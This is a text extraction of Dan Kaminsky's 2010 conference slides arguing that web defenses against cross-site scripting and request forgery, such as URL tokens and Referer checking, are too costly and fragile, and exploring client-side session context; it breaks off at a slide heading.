Dan Kaminsky Director of Penetration Testing Ioactive: For Great Justice Rethinking The Strange Reality of Web Defense
Dan Kaminsky Director of Penetration Testing Ioactive: For Great Justice Rethinking The Strange Reality of Web Defense
Dan Kaminsky
Director Of Penetration Testing
IOActive
Introduction
• I’m Dan Kaminsky
– This is not a talk on DNS
– This is not a talk on DNSSEC
– This is not a talk on X.509
– This is (mostly) not even a talk about offense
• Though it’ll happen
• We are here to discuss defense
– Why it’s hard
– Why it’s still hard
– How the Web is (still!) difficult to secure in very basic ways
– What technical steps can be taken to make it easier for developers to
secure their sites
Warning
• This is one of the more ornery talks I have ever
delivered.
– I don’t think Security has been sufficiently
respectful of other engineering requirements.
– I don’t think randomized tokens in GETs or POST
are a particularly scalable solution to XSRF
– I’m not a big fan of regular expressions. Period.
And you won’t believe what I want to do with
Base64.
The Web Has Won
• HTML, JavaScript, and CSS are, by a wide margin,
the most popular programming languages on the
planet, at least for front end design
– Bigger than Win32
– Bigger than Objective C
– Bigger than Java
– Bigger than Flash
• Why install software when you can just browse
to www.kayak.com?
The Web Has A Security Problem
• Cross Site Scripting (XSS) and Cross Site Request
Forgery (XSRF) are endemic
• SQL Injection is not going away
– And not just SQL – XML, JSON, even LDAP is in
trouble
• These are not new problems. These go back a
decade. Why are we still suffering them?
– After all, we’ve been saying for years, use randomized
tokens in URLs, and “validate your input”!
The Traditional Response
• “Developers are stupid and lazy.”
– This is a great response – for our egos
– It defines hackers as intelligent and industrious!
The Reality (as I see it)
• It remains too difficult to make web browsers do
surprisingly simple things
– “Dan, I’ve been coming to Defcon for years. I love
security. But you know, it’s $50K for me to build the
site, and $150K for me to get somebody to come out
and secure it. Do you know anybody who will pay 4x
for me to build them a site?”
– Our advice for how to secure things is really amazingly
expensive
• Expensive in terms of dev hours
• Expensive in terms of outside validation
– We think that’s OK, because Security Is Important
The Reality Of Randomized Token In URLs (to
stop XSRF, and maybe XSS)
• http://www.site.com/foo.php?token=298371231
– (Or a hidden form element in POSTs)
• [All] application local URLs have to be rewritten for using the randomizer
object. While standard HTML forms and hyperlinks pose no special
challenge, prior existing JavaScript may be harder to deal with. All
JavaScript functions that assign values to document.location or open
new windows have to be located and modified. Also all existing onclick
and onsubmit events have to be rewritten. Furthermore, HTML code
might include external referenced JavaScript libraries, which have to be
processed as well. Because of these problems, a web application that is
protected by such a solution has to be examined and tested thoroughly.
– Martin Johns, University of Hamburg, on “SessionSafe”, a system which put
randomized tokens in DNS subdomains – an easier place for them (thanks to
Amit Klein for pointing me to this paper)
– http://www.informatik.uni-hamburg.de/SVS/papers/2006_esorics_SessionSafe.p
df
And it’s not like we’re weak in really obscure
places
• XSS and XSRF are both failures of Session Management
– Session management isn’t exactly an obscure feature! It’s an
inherent aspect of any system that allows authentication!
• Except the web wasn’t originally designed as a particularly authenticated
resource
• All material was designed to be able to link to all other material
• Most material was assumed to be flat text files in a directory somewhere
– Session management’s “canonical implementation” is cookies
• Small blobs of data that, once added to a domain, are attached to each request
to that domain
– Cookies don’t care from where a request came from
• So, badguy.com can send you to goodbank.com, any URL, and mix his chosen
URL with your authenticated credentials
• This is the heart of XSS and XSRF
• XSRF tokens are about sacrificing the automatic nature of cookies for manual
integration of the token in each generated URI
A Question
• It’s 2010. Why is secure session management still such a
hack?
– XSRF tokens are painful and expensive to deploy (and only kind of
work)
• Tokens in URIs, either subdomain or GET param, leak via Referer headers
and document.referrer, see Nathan Hamiel and Shawn Moyer’s Dynamic
CSRF talk from BH2010
– OK, yes, XSRF tokens could be made one-time use, or bound to the rest of the URI.
STILL.
– Cookies leak, even with “secure”, even with “httponly”
• Answer: The security community hasn’t asked for anything
better.
– Gut response: “See, this is why third party cookies should be shut
off! Then, they’ll have to use XSRF tokens!”
• “Who cares if it’ll break the web? It’ll still work…um…mostly…”
Our Message
• “It doesn’t matter if it’s expensive.”
• “It doesn’t matter if it’s fragile.”
• “It doesn’t matter if it breaks things.”
• “It doesn’t matter if it doesn’t even do a great job
securing things.”
• It’s security! Obviously everybody has to do it!
– And so instead of improving our technologies to the
point where security is achievable, we spin our wheels
demanding the deployment of immature defenses
You may disagree.
• If you think all our existing solutions are good
enough, and the only problem is lazy and
stupid developers (“insufficiently incentivized”
if you’re an academic), nothing I can say is
going to convince you otherwise.
• But if you agree, then your immediate question
should be: What are you recommending?
– It is not enough to curse the darkness. One must
praise the light!
First Law Of Securing the Web:
You are not allowed to break the web.
• This is a point of significant contention!
– Not just about cookies.
• Remember “Mogul”, the huge project centered
around dealing with Marsh Ray’s TLS Renegotiation
vulnerability?
• Remember how it involved an enormous IETF
standardization effort around a fix, and a huge amount
of work?
• Did you notice all the patch announcements of crypto
libraries applying the renegotiation fix?
The Fix Is Off By Default In Firefox
• Just like I told Marsh Ray it would be.
• “Note that to benefit from the fix for CVE-2009-3555 added
in nss-3.12.6, Firefox 3.6 users will need to set their
security.ssl.require_safe_negotiation preference to true. In
Mandriva the default setting is false due to problems with
some common sites.” – Mandriva Patch Notes
– security.ssl.allow_unrestricted_renego_everywhere__temporaril
y_available_pref
Current default value: DEPENDS, see end of section
The development version of Firefox (3.7-pre) uses "false"
The stable releases 3.5.9 and 3.6.2 use "true"
As soon as a sufficient amount of servers had a chance to
upgrade, the default in stable releases will be switched to "false",
too
Corollary: You Can’t Afford To Wait For
Everybody To Patch
• “The Internet Has No Flag Days”
– i.e. “OK everyone, on July 8th, 2013, we will all
simultaneously stop using Internet Explorer 6”
• They needed to find a way to securely downgrade
for servers that didn’t support their fix.
– They didn’t (maybe they couldn’t?), and ultimately, it’s
now all lost effort.
– When will enough internal servers patch? Never.
– Hard but true.
Second Law Of Securing The Web:
Defenses must meet all engineering requirements
• Classical security theory: “The attacker need only find
one bug, while the defender must find them all.”
– This is true, but incomplete.
• Updated security theory: “The attacker need only
consider one engineering requirement, while the
defender must balance them all.”
– If your defense is not fast enough, its not good enough
– If your defense is not compatible enough, its not good
enough
– If your defense is not reliable enough, its not good enough
– If your defense is not usable enough, its not good enough
– If your defense is too hard to build or deploy, its will probably
not be either built nor deployed
Security Is (Still!) New
• Security is a new first class engineering requirement for
software
– Power efficiency is a new first class engineering requirement for
consumer electronics
– Just because the TV takes less electricity doesn’t mean it’s allowed to
be any less pretty
– Just because the code is more secure doesn’t mean it’s allowed to be
slow
• There remains surprisingly basic work to be done to facilitate
security
– Building a secure session context is one of those things
– Lets talk about how to do that, while not screwing everything else up
So. How are we going to get a secure session
context?
• First – why does a secure session context
improve security?
– What do Cross Site Scripting (XSS) and Cross Site
Request Forgery (XSRF) have in common?
• XS: Cross Site
A Tale Of Two Classes Of Web Page
Amazon.Com Shopping Cart: Needs
BBC News: Needs Deep Linking Security From Outside Attackers
On Boundaries
• Most natural place to place boundary: Unauthenticated vs.
Authenticated
– Unauthenticated pages are the best landing points
– Authenticated pages expose the greatest complexity
• A strong session context prevents (Reflected) XSS and XSRF
from executing at all
– The attacker just cannot navigate to the endpoint with the bug
– Making entire families of bugs unexploitable is always a good thing
– If even the unauthenticated landing points have sufficient
complexity that they’re likely to be XSSable, then www.foo.com can
be 302 Redirected to public.foo.com or even www.foopublic.com.
The Most Common Attempt:
Server-Side Referrer Checking
• HTTP requests can contain a “Referer” field, which is supposed to
describe the URL of the page that sourced the request for a
particular asset
– Yes, it’s misspelled in the standard
• It is possible for an HTTP server to examine every request that
comes in with an authenticated Cookie, and see if it also comes in
with a Referer header from the same site
• Many Content Management Systems have attempted to use Referer
checking to stop XSRF and related attacks
– Developers, finding a defensive technology that is easy and nondisruptive
to implement, will actually do the work!
• We tell them not to do this, for “Security Reasons”
– “Referer headers can be spoofed using XMLHTTP and by using flash as
demonstrated by Amit Klein and rapid7 and therefore cannot be trusted.”
• http://www.cgisecurity.com/csrf-faq.html
But It’s Not True!
• Amit et al fixed this years ago
• There is no known mechanism for causing a
browser to emit an arbitrary Referer header,
and hasn’t been for quite some time.
– More importantly, if one is found, it’s fixed, just
like a whole host of other browser bugs
• So can we use this?
The Real Reason You Can’t Depend On Server-
Side Referrer: Appcompat
• There are many mechanisms that result in web browsers
navigating from page to page
– Follow an anchor
– Change document.location.href
– Follow a 302 redirect
– Follow a <meta http-equiv=“refresh”> link
– Window.open
• Referer header inconsistently attached – some methods
have the header, some don’t
– Differs by browser
– Really differs by plugin
…and that’s without the “security tools”
butting in
• http://codex.wordpress.org/Enable_Sending_Referrers -- how to
make Wordpress administration work (at least for 2.0x) if you have
any of the following installed:
– Norton Internet Security, Norton Personal, NetBarrier, SyGate Firewall,
Kerio Firewall 4, Zone Alarm Pro, Agnitum Outpost Firewall Pro 2008,
McAfee, Privoxy, etc.
• And that’s to say nothing about network proxies like Squid, from
which about one fifth of HTTP requests are sourced
• Most blocking is there to protect privacy interests or to protect
against Dynamic XSRF attacks, which is reasonable, but it applies
even to Referer headers for the same site
– One security technology interfering with another security technology?
Impossible!
Fail Open Openly Failing
• “Can’t we just enforce XSRF protections if there’s a
Referer header, and allow the user in anyway (fail
open) if the header is missing?”
– This is actually the policy of a some CMS’s in the field
– Since there are navigation types that suppress Referer
even on unfiltered hosts (<meta http-equiv=“refresh”>)
they’re exposed.
• See also, HTTPS->HTTP Referer suppression, which is an
intentional feature to prevent full URI leakage from the secure
context (thanks David Ross, Sirdarckat)
Can We Go Client Side?
• Suppose there’s too much weirdness going on at the HTTP layer to
detect cross-site activity at the server
– Not going to go into the Origin header, lets just say it’s unusable in its
present state
• Suppose we could detect such behavior in the client. Could we use
it?
– “But we’re pushing security to the client! We’re not supposed to trust the
client!”
– It is the client that has the context of where the request really came from;
the server is impoverished
• Two problems
– 1) How do we prevent execution of an XSS?
– 2) How do we prevent navigation to an XSRF vulnerable endpoint?
Preventing Script Execution Via Interpreter Suicide